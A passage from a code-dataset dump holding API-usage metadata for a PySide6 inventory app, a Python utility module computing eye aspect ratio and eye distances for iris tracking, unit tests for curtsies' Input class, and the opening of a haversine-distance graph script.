"PySide6.QtWidgets.QTableWidgetItem", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 455, "usage_type": "call"}, {"api_name": "PySide6.QtGui.QColor.fromRgb", "line_number": 456, "usage_type": "call"}, {"api_name": "PySide6.QtGui.QColor", "line_number": 456, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.ItemIsEditable", "line_number": 459, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 459, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QMainWindow", "line_number": 470, "usage_type": "name"}, {"api_name": "PySide6.QtGui.QIcon", "line_number": 483, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 488, "usage_type": "call"}, {"api_name": "os.path", "line_number": 488, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 488, "usage_type": "attribute"}, {"api_name": "data_management.Inventario", "line_number": 493, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QWidget", "line_number": 499, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 504, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 505, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 506, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 507, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 508, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDateEdit", "line_number": 510, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QDate.currentDate", "line_number": 510, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QDate", "line_number": 510, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QDateEdit", "line_number": 511, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QDate.currentDate", "line_number": 511, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QDate", 
"line_number": 511, "usage_type": "name"}, {"api_name": "PySide6.QtGui.QIcon.fromTheme", "line_number": 513, "usage_type": "call"}, {"api_name": "PySide6.QtGui.QIcon", "line_number": 513, "usage_type": "name"}, {"api_name": "PySide6.QtGui.QIcon", "line_number": 514, "usage_type": "call"}, {"api_name": "PySide6.QtGui.QAction", "line_number": 515, "usage_type": "call"}, {"api_name": "graphictools.MplCanvas", "line_number": 519, "usage_type": "call"}, {"api_name": "graphictools.NavigationToolbar", "line_number": 520, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 524, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 525, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 526, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 535, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 536, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 538, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGridLayout", "line_number": 544, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QWidget", "line_number": 552, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTabWidget", "line_number": 556, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGridLayout", "line_number": 562, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 582, "usage_type": "call"}, {"api_name": "os.path", "line_number": 582, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 583, "usage_type": "call"}, {"api_name": "os.path", "line_number": 583, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 610, "usage_type": "call"}, {"api_name": "os.path", "line_number": 610, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 615, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 618, "usage_type": "call"}, {"api_name": "os.path", "line_number": 618, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 621, "usage_type": "call"}, {"api_name": "json.load", "line_number": 629, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 640, "usage_type": "call"}, {"api_name": "os.path", "line_number": 640, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 641, "usage_type": "call"}, {"api_name": "os.path", "line_number": 641, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 642, "usage_type": "call"}, {"api_name": "os.path", "line_number": 642, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 644, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.WindowNoState", "line_number": 660, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 660, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 673, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Warning", "line_number": 673, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Ok", "line_number": 675, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 675, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 682, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Warning", "line_number": 682, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Ok", "line_number": 684, "usage_type": 
"attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 684, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 693, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 697, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Warning", "line_number": 697, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Ok", "line_number": 701, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 701, "usage_type": "name"}, {"api_name": "utilitarios.organize", "line_number": 711, "usage_type": "call"}, {"api_name": "utilitarios.rotina_operacoes", "line_number": 723, "usage_type": "call"}, {"api_name": "gc.collect", "line_number": 724, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 731, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Critical", "line_number": 731, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Ok", "line_number": 732, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 732, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 747, "usage_type": "call"}, {"api_name": "gc.collect", "line_number": 804, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 811, "usage_type": "call"}, {"api_name": "os.path", "line_number": 811, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QFileDialog.getSaveFileName", "line_number": 812, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QFileDialog", "line_number": 812, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 819, "usage_type": "call"}, {"api_name": "os.path", "line_number": 819, "usage_type": "attribute"}, {"api_name": "utilitarios.save_excel", "line_number": 821, "usage_type": "call"}, {"api_name": "xlsxwriter.exceptions", "line_number": 823, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 824, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Critical", "line_number": 824, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Ok", "line_number": 825, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 825, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QDialog", "line_number": 839, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QDialog.__init__", "line_number": 845, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDialog", "line_number": 845, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 854, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 855, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTableWidget", "line_number": 857, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGroupBox", "line_number": 859, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 860, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLineEdit", "line_number": 861, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGroupBox", "line_number": 864, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QCheckBox", "line_number": 865, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QCheckBox", "line_number": 868, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDateEdit", "line_number": 873, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QDate", "line_number": 873, "usage_type": 
"call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 874, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHeaderView.Stretch", "line_number": 880, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QHeaderView", "line_number": 880, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 885, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGridLayout", "line_number": 892, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 893, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 899, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 900, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 907, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 908, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 909, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 911, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 914, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 915, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 927, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 928, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 957, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Warning", "line_number": 957, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Ok", "line_number": 959, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 959, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 965, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Ok", "line_number": 967, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 967, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTableWidgetItem", "line_number": 979, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.ItemIsEditable", "line_number": 980, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 980, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.DateFormat", "line_number": 998, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 998, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTabBar", "line_number": 1015, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTabBar.tabSizeHint", "line_number": 1017, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTabBar", "line_number": 1017, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QStylePainter", "line_number": 1022, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QStyleOptionTab", "line_number": 1023, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QStyle.CE_TabBarTabShape", "line_number": 1027, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QStyle", "line_number": 1027, "usage_type": "name"}, {"api_name": "PySide6.QtCore.QRect", "line_number": 1032, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QPoint", "line_number": 1032, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QStyle.CE_TabBarTabLabel", "line_number": 1040, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QStyle", "line_number": 1040, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTabWidget", 
"line_number": 1044, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTabWidget.__init__", "line_number": 1046, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTabWidget", "line_number": 1046, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTabWidget.West", "line_number": 1048, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QTabWidget", "line_number": 1048, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QProxyStyle", "line_number": 1051, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QStyle.CE_TabBarTabLabel", "line_number": 1053, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QStyle", "line_number": 1053, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QStyle.PM_TabBarIconSize", "line_number": 1054, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QStyle", "line_number": 1054, "usage_type": "name"}, {"api_name": "PySide6.QtCore.QRect", "line_number": 1055, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QStyle.PM_TabBarIconSize", "line_number": 1056, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QStyle", "line_number": 1056, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QProxyStyle.drawControl", "line_number": 1060, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QProxyStyle", "line_number": 1060, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QDialog", "line_number": 1063, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QDialog.__init__", "line_number": 1070, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDialog", "line_number": 1070, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 1079, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 1080, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 1081, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QWidget", "line_number": 1082, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QWidget", "line_number": 1083, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QComboBox", "line_number": 1084, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QComboBox", "line_number": 1085, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLineEdit", "line_number": 1086, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTabWidget", "line_number": 1089, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 1098, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 1099, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 1101, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 1106, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 1107, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 1108, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 1115, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 1117, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1135, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QFileDialog.getOpenFileNames", "line_number": 1136, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QFileDialog", "line_number": 1136, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 1154, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 1154, "usage_type": "attribute"}, {"api_name": "utilitarios.xls2file", "line_number": 1158, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 1169, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1174, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1176, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTableWidget", "line_number": 1183, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QHeaderView.Stretch", "line_number": 1198, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QHeaderView", "line_number": 1198, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QHeaderView.Stretch", "line_number": 1199, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QHeaderView", "line_number": 1199, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 1210, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTableWidgetItem", "line_number": 1211, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTableWidgetItem", "line_number": 1212, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.ItemIsEditable", "line_number": 1216, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 1216, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.ItemIsEditable", "line_number": 1217, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 1217, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 1230, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QComboBox", "line_number": 1231, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QComboBox", "line_number": 1232, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 1276, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1276, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 1276, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 1277, "usage_type": "call"}, {"api_name": "ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID", "line_number": 1281, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 1281, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QApplication", "line_number": 1282, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 1282, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 1293, "usage_type": "call"}]} +{"seq_id": "72526826843", "text": "import numpy as np\nimport math\nfrom typing import List, Mapping, Optional, Tuple, Union\n\n\ndef denormalize_coordinates(\n normalized_x: float, normalized_y: float, image_width: int, image_height: int\n) -> Union[None, Tuple[int, int]]:\n \"\"\"Converts normalized value pair to pixel coordinates.\"\"\"\n\n # Checks if the float value is between 0 and 1.\n def is_valid_normalized_value(value: float) -> bool:\n return (value > 0 or math.isclose(0, value)) and (\n value < 1 or math.isclose(1, value)\n )\n\n if not (\n is_valid_normalized_value(normalized_x)\n and is_valid_normalized_value(normalized_y)\n ):\n # TODO: Draw coordinates even if it's outside of the image bounds.\n return None\n x_px = min(math.floor(normalized_x * image_width), image_width - 1)\n y_px = min(math.floor(normalized_y * image_height), image_height - 1)\n return x_px, y_px\n\n\ndef distance(point_1, point_2):\n \"\"\"Calculate l2-norm between two points\"\"\"\n dist = sum([(i - j) ** 2 for i, j in zip(point_1, point_2)]) ** 0.5\n return dist\n\n\ndef 
get_ear(landmarks, refer_idxs, frame_width, frame_height):\n \"\"\"\n Calculate Eye Aspect Ratio for one eye.\n\n Args:\n landmarks: (list) Detected landmarks list\n refer_idxs: (list) Index positions of the chosen landmarks\n in order P1, P2, P3, P4, P5, P6\n frame_width: (int) Width of captured frame\n frame_height: (int) Height of captured frame\n\n Returns:\n ear: (float) Eye aspect ratio\n coords_points: (list) Pixel coordinates of the chosen landmarks\n \"\"\"\n try:\n # Convert the normalized landmarks to pixel coordinates\n coords_points = []\n for i in refer_idxs:\n lm = landmarks[i]\n coord = denormalize_coordinates(lm[0], lm[1], frame_width, frame_height)\n coords_points.append(coord)\n\n # Euclidean distances between the two sets of vertical eye landmarks\n # (P2-P6, P3-P5) and between the horizontal ones (P1-P4)\n P2_P6 = distance(coords_points[1], coords_points[5])\n P3_P5 = distance(coords_points[2], coords_points[4])\n P1_P4 = distance(coords_points[0], coords_points[3])\n\n # Compute the eye aspect ratio\n ear = (P2_P6 + P3_P5) / (2.0 * P1_P4)\n\n except:\n ear = 0.0\n coords_points = None\n\n return ear, coords_points\n\n\ndef calculate_avg_ear(landmarks, left_eye_idxs, right_eye_idxs, image_w, image_h):\n \"\"\"Calculate Eye aspect ratio\"\"\"\n\n left_ear, left_lm_coordinates = get_ear(landmarks, left_eye_idxs, image_w, image_h)\n right_ear, right_lm_coordinates = get_ear(\n landmarks, right_eye_idxs, image_w, image_h\n )\n Avg_EAR = (left_ear + right_ear) / 2.0\n\n return Avg_EAR, (left_lm_coordinates, right_lm_coordinates)\n\n\ndef eye_converter(\n frame,\n video,\n left_eye_2d,\n right_eye_2d,\n face_center_p1_2d,\n face_center_p2_2d,\n warpped=False,\n left_eye_depth_mm=None,\n right_eye_depth_mm=None,\n):\n p1 = face_center_p1_2d[:2]\n p2 = face_center_p2_2d[:2]\n # frame = cv2.line(frame, (int(p1[0] * video.frame_width), int(p1[1] * video.frame_height)), (int(p2[0] * video.frame_width), int(p2[1] * video.frame_height)), (0, 0, 255), 1)\n p3 = left_eye_2d[:2]\n p4 = right_eye_2d[:2]\n # frame = cv2.line(frame, (int(p3[0] * video.frame_width), int(p3[1] * video.frame_height)), (int(p4[0] * video.frame_width), int(p4[1] * video.frame_height)), (0, 255, 0), 1)\n\n denom = (p1[0] - p2[0]) * (p3[1] - p4[1]) - (p1[1] - p2[1]) * (p3[0] - p4[0])\n origin_x = (\n (p1[0] * p2[1] - p1[1] * p2[0]) * (p3[0] - p4[0])\n - (p1[0] - p2[0]) * (p3[0] * p4[1] - p3[1] * p4[0])\n ) / denom\n origin_y = (\n (p1[0] * p2[1] - p1[1] * p2[0]) * (p3[1] - p4[1])\n - (p1[1] - p2[1]) * (p3[0] * p4[1] - p3[1] * p4[0])\n ) / denom\n # frame = cv2.circle(frame, (int(origin_x * video.frame_width), int(origin_y * video.frame_height)), 5, (255, 0, 0), -1)\n if warpped:\n left_eye_dist_px = np.sqrt(\n (\n ((p3[0] - origin_x) * video.frame_width) ** 2\n + ((p3[1] - origin_y) * video.frame_height) ** 2\n )\n )\n right_eye_dist_px = np.sqrt(\n (\n ((p4[0] - origin_x) * video.frame_width) ** 2\n + ((p4[1] - origin_y) * video.frame_height) ** 2\n )\n )\n # frame = cv2.putText(frame, f\"{int(left_eye_dist_px)} px\", (int(p3[0] * video.frame_width), int(p3[1] * video.frame_height) + 20), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255))\n # frame = cv2.putText(frame, f\"{int(right_eye_dist_px)} px\", (int(p4[0] * video.frame_width), int(p4[1] * video.frame_height) + 20), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255))\n # cv2.imshow(\"Eye distance (Warpped)\", frame)\n return (left_eye_dist_px, right_eye_dist_px), None\n else:\n\n left_eye_dist_px = np.sqrt(\n (\n ((p3[0] - origin_x) * video.frame_width) ** 2\n + ((p3[1] - origin_y) * video.frame_height) ** 2\n )\n )\n right_eye_dist_px = np.sqrt(\n (\n ((p4[0] - origin_x) * video.frame_width) ** 2\n + ((p4[1] - 
origin_y) * video.frame_height) ** 2\n )\n )\n\n eye_dist_2d_px = left_eye_dist_px + right_eye_dist_px\n eye_dist_2d_mm = eye_dist_2d_px / video.focal_length * left_eye_depth_mm\n # print(eye_dist_2d_mm)\n\n eye_dist_mm = np.sqrt(\n eye_dist_2d_mm**2 + (left_eye_depth_mm - right_eye_depth_mm) ** 2\n )\n left_eye_dist_mm = left_eye_dist_px / eye_dist_2d_px * eye_dist_mm\n right_eye_dist_mm = eye_dist_mm - left_eye_dist_mm\n # frame = cv2.putText(frame, f\"{int(left_eye_dist_px)}px, {int(left_eye_dist_mm)}mm\", (int(p3[0] * video.frame_width) - 50, int(p3[1] * video.frame_height) + 20), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 255, 0))\n # frame = cv2.putText(frame, f\"{int(right_eye_dist_px)}px, {int(right_eye_dist_mm)}mm\", (int(p4[0] * video.frame_width), int(p4[1] * video.frame_height) + 50), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255, 255, 0))\n # cv2.imshow(\"Eye distance (Unwarpped)\", frame)\n return (left_eye_dist_px, right_eye_dist_px), (\n left_eye_dist_mm,\n right_eye_dist_mm,\n )\n", "repo_name": "cortictechnology/cortic-platform-samples", "sub_path": "services/iris_tracking_service/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 6214, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "math.isclose", "line_number": 13, "usage_type": "call"}, {"api_name": "math.isclose", "line_number": 14, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 23, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 24, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 147, "usage_type": "call"}]} +{"seq_id": "24875093979", "text": "import unittest\nfrom mock import Mock\nfrom curtsies import events\nimport select\n\nfrom curtsies.input import Input, getpreferredencoding\n\nclass TestInput(unittest.TestCase):\n def test_create(self):\n inp = Input()\n\n def test_iter(self):\n inp = Input()\n inp.send = Mock()\n inp.send.return_value = None\n for i, e in zip(range(3), inp):\n self.assertEqual(e, None)\n self.assertEqual(inp.send.call_count, 3)\n\n def test_mocks(self):\n events.a = 10\n self.assertTrue(True)\n\n def test_mocks2(self):\n self.assertEqual(events.a, 10)\n\n def test_send(self):\n inp = Input()\n inp.unprocessed_bytes = [b'a']\n self.assertEqual(inp.send('nonsensical value'), u'a')\n\n def test_send_nonblocking_no_event(self):\n inp = Input()\n inp.unprocessed_bytes = []\n self.assertEqual(inp.send(0), None)\n\n def test_nonblocking_read(self):\n inp = Input()\n self.assertEqual(inp.nonblocking_read(), 0)\n\n def test_send_paste(self):\n inp = Input()\n inp.unprocessed_bytes = []\n inp.wait_for_read_ready_or_timeout = Mock()\n inp.wait_for_read_ready_or_timeout.return_value = (True, None)\n inp.nonblocking_read = Mock()\n n = inp.paste_threshold + 1\n\n first_time = [True]\n def side_effect():\n if first_time:\n inp.unprocessed_bytes.extend([b'a']*n)\n first_time.pop()\n return n\n else:\n return None\n inp.nonblocking_read.side_effect = side_effect\n\n r = inp.send(0)\n self.assertEqual(type(r), events.PasteEvent)\n 
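# --- Editor's aside (illustrative sketch) -------------------------------------
# test_send_paste above drives Input.send() through a Mock whose side_effect
# function returns a byte count once and then None. Mock also accepts an
# iterable side_effect, which expresses the same call sequence more compactly
# (names below are hypothetical):
from unittest import mock

reader = mock.Mock()
reader.side_effect = [7, None]  # first call -> 7, second call -> None
assert reader() == 7
assert reader() is None
# ------------------------------------------------------------------------------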
self.assertEqual(r.events, [u'a'] * n)\n", "repo_name": "amjith/curtsies", "sub_path": "tests/test_input.py", "file_name": "test_input.py", "file_ext": "py", "file_size_in_byte": 1723, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "86", "api": [{"api_name": "unittest.TestCase", "line_number": 8, "usage_type": "attribute"}, {"api_name": "curtsies.input.Input", "line_number": 10, "usage_type": "call"}, {"api_name": "curtsies.input.Input", "line_number": 13, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 14, "usage_type": "call"}, {"api_name": "curtsies.events.a", "line_number": 21, "usage_type": "attribute"}, {"api_name": "curtsies.events", "line_number": 21, "usage_type": "name"}, {"api_name": "curtsies.events.a", "line_number": 25, "usage_type": "attribute"}, {"api_name": "curtsies.events", "line_number": 25, "usage_type": "name"}, {"api_name": "curtsies.input.Input", "line_number": 28, "usage_type": "call"}, {"api_name": "curtsies.input.Input", "line_number": 33, "usage_type": "call"}, {"api_name": "curtsies.input.Input", "line_number": 38, "usage_type": "call"}, {"api_name": "curtsies.input.Input", "line_number": 42, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 44, "usage_type": "call"}, {"api_name": "mock.Mock", "line_number": 46, "usage_type": "call"}, {"api_name": "curtsies.events.PasteEvent", "line_number": 60, "usage_type": "attribute"}, {"api_name": "curtsies.events", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "25948156614", "text": "import math\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n\n# Function to calculate distance between two coordinates using Haversine formula\ndef haversine(coord1, coord2):\n lat1, lon1 = coord1\n lat2, lon2 = coord2\n \n # Radius of the Earth in km\n R = 6371\n dlat = lat2 - lat1\n dlon = lon2 - lon1\n a = (pow(math.sin(math.radians(dlat) / 2), 2) +\n math.cos(math.radians(lat1)) * math.cos(math.radians(lat2)) *\n pow(math.sin(math.radians(dlon) / 2), 2))\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n return R * c\n\ndef read_file(filename):\n adjacency_list = {}\n\n with open(filename, 'r') as file:\n for line in file:\n node1, node2 = line.strip().split()\n\n if node1 in adjacency_list:\n 